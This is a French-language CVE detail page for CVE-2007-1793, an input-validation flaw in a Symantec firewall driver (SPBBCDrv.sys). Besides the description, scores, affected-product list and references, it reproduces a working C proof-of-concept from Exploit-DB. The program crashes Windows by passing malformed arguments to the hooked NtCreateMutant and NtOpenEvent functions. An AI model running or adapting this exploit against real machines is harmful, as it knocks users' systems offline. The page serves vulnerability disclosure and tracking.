CVE-2007-1793 : Détail

CVE-2007-1793

A03-Injection
0.07%V3
Local
2007-04-02
20h00 +00:00
2018-10-16
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

SPBBCDrv.sys in Symantec Norton Personal Firewall 2006 9.1.0.33 and 9.1.1.7 does not validate certain arguments before being passed to hooked SSDT function handlers, which allows local users to cause a denial of service (crash) or possibly execute arbitrary code via crafted arguments to the (1) NtCreateMutant and (2) NtOpenEvent functions. NOTE: it was later reported that Norton Internet Security 2008 15.0.0.60, and possibly other versions back to 2006, are also affected.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 29810

Date de publication : 2007-03-31 22h00 +00:00
Auteur : David Matousek
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/23241/info Multiple Symantec products are prone to a local denial-of-service vulnerability. This issue occurs when attackers supply invalid argument values to the 'SPBBCDrv.sys' driver. A local attacker may exploit this issue to crash affected computers, denying service to legitimate users. /* Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00000P002NF) Usage: prog FUNCNAME FUNCNAME - name of function to be checked Description: This program calls given function with parameters that cause the crash of the system. This happens because of insufficient check of function arguments in the driver of the firewall. Test: Running the testing program with the name of function from the list of functions with insufficient check of arguments. */ #undef __STRICT_ANSI__ #include <stdio.h> #include <string.h> #include <windows.h> #include <ddk/ntapi.h> #include <ddk/ntifs.h> void about(void) { printf("Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00000P002NF)\n"); printf("Windows Personal Firewall analysis project\n"); printf("Copyright 2007 by Matousec - Transparent security\n"); printf("http://www.matousec.com/""\n\n"); return; } void usage(void) { printf("Usage: test FUNCNAME\n" " FUNCNAME - name of function to be checked\n"); return; } int main(int argc,char **argv) { about(); if (argc!=2) { usage(); return 1; } if (!stricmp(argv[1],"NtCreateMutant") || !stricmp(argv[1],"ZwCreateMutant")) { HANDLE handle; OBJECT_ATTRIBUTES oa; InitializeObjectAttributes(&oa,(PVOID)1,0,NULL,NULL); ZwCreateMutant(&handle,0,&oa,FALSE); } else if (!stricmp(argv[1],"NtOpenEvent") || !stricmp(argv[1],"ZwOpenEvent")) { HANDLE handle; OBJECT_ATTRIBUTES oa; InitializeObjectAttributes(&oa,(PVOID)1,0,NULL,NULL); ZwOpenEvent(&handle,0,&oa); } else printf("\nI do not know how to exploit the vulnerability using this function.\n"); printf("\nTEST FAILED!\n"); return 1; }

Products Mentioned

Configuraton 0

Symantec>>Antivirus >> Version 10.0

    Symantec>>Antivirus >> Version 10.0.1

      Symantec>>Antivirus >> Version 10.0.1.1

        Symantec>>Antivirus >> Version 10.0.2

          Symantec>>Antivirus >> Version 10.0.2.1

            Symantec>>Antivirus >> Version 10.0.2.2

              Symantec>>Antivirus >> Version 10.0.3

                Symantec>>Antivirus >> Version 10.0.4

                  Symantec>>Antivirus >> Version 10.0.5

                    Symantec>>Antivirus >> Version 10.0.6

                      Symantec>>Antivirus >> Version 10.0.7

                        Symantec>>Antivirus >> Version 10.0.8

                          Symantec>>Antivirus >> Version 10.0.9

                            Symantec>>Client_security >> Version 3.0

                            Symantec>>Client_security >> Version 3.0.0.359

                            Symantec>>Client_security >> Version 3.0.1.1000

                            Symantec>>Client_security >> Version 3.0.1.1001

                            Symantec>>Client_security >> Version 3.0.1.1007

                            Symantec>>Client_security >> Version 3.0.1.1008

                            Symantec>>Client_security >> Version 3.0.1.1009

                              Symantec>>Client_security >> Version 3.0.2

                              Symantec>>Client_security >> Version 3.0.2.2000

                              Symantec>>Client_security >> Version 3.0.2.2001

                              Symantec>>Client_security >> Version 3.0.2.2002

                              Symantec>>Client_security >> Version 3.0.2.2010

                              Symantec>>Client_security >> Version 3.0.2.2011

                              Symantec>>Client_security >> Version 3.0.2.2020

                              Symantec>>Client_security >> Version 3.0.2.2021

                              Symantec>>Client_security >> Version 3.1

                              Symantec>>Client_security >> Version 3.1.0.396

                              Symantec>>Client_security >> Version 3.1.0.401

                              Symantec>>Client_security >> Version 3.1.394

                              Symantec>>Client_security >> Version 3.1.396

                              Symantec>>Client_security >> Version 3.1.400

                              Symantec>>Client_security >> Version 3.1.401

                                Symantec>>Norton_360 >> Version 1.0

                                  Symantec>>Norton_antispam >> Version 2004

                                    Symantec>>Norton_antispam >> Version 2005

                                      Symantec>>Norton_antivirus >> Version 2004

                                      Symantec>>Norton_antivirus >> Version 2005

                                        Symantec>>Norton_antivirus >> Version 2006

                                          Symantec>>Norton_antivirus >> Version 2007

                                            Symantec>>Norton_antivirus >> Version 2008

                                              Symantec>>Norton_internet_security >> Version 2004

                                              Symantec>>Norton_internet_security >> Version 2005

                                                Symantec>>Norton_internet_security >> Version 2006

                                                  Symantec>>Norton_internet_security >> Version 2007

                                                    Symantec>>Norton_internet_security >> Version 2008

                                                      Symantec>>Norton_personal_firewall >> Version 2004

                                                        Symantec>>Norton_personal_firewall >> Version 2005

                                                          Symantec>>Norton_personal_firewall >> Version 2006

                                                            Symantec>>Norton_personal_firewall >> Version 2006_9.1.0.33

                                                              Symantec>>Norton_personal_firewall >> Version 2006_9.1.1.7

                                                                Symantec>>Norton_system_works >> Version 2004

                                                                Symantec>>Norton_system_works >> Version 2005

                                                                  Symantec>>Norton_system_works >> Version 2006

                                                                    Références

                                                                    http://www.vupen.com/english/advisories/2007/1192
                                                                    Tags : vdb-entry, x_refsource_VUPEN
                                                                    http://www.securitytracker.com/id?1021386
                                                                    Tags : vdb-entry, x_refsource_SECTRACK
                                                                    http://www.securitytracker.com/id?1017837
                                                                    Tags : vdb-entry, x_refsource_SECTRACK
                                                                    http://www.securityfocus.com/bid/23241
                                                                    Tags : vdb-entry, x_refsource_BID
                                                                    http://www.securitytracker.com/id?1021388
                                                                    Tags : vdb-entry, x_refsource_SECTRACK
                                                                    http://www.securitytracker.com/id?1021389
                                                                    Tags : vdb-entry, x_refsource_SECTRACK
                                                                    http://osvdb.org/34692
                                                                    Tags : vdb-entry, x_refsource_OSVDB
                                                                    http://www.securitytracker.com/id?1017838
                                                                    Tags : vdb-entry, x_refsource_SECTRACK
                                                                    http://www.securitytracker.com/id?1021387
                                                                    Tags : vdb-entry, x_refsource_SECTRACK
                                                                    http://secunia.com/advisories/24677
                                                                    Tags : third-party-advisory, x_refsource_SECUNIA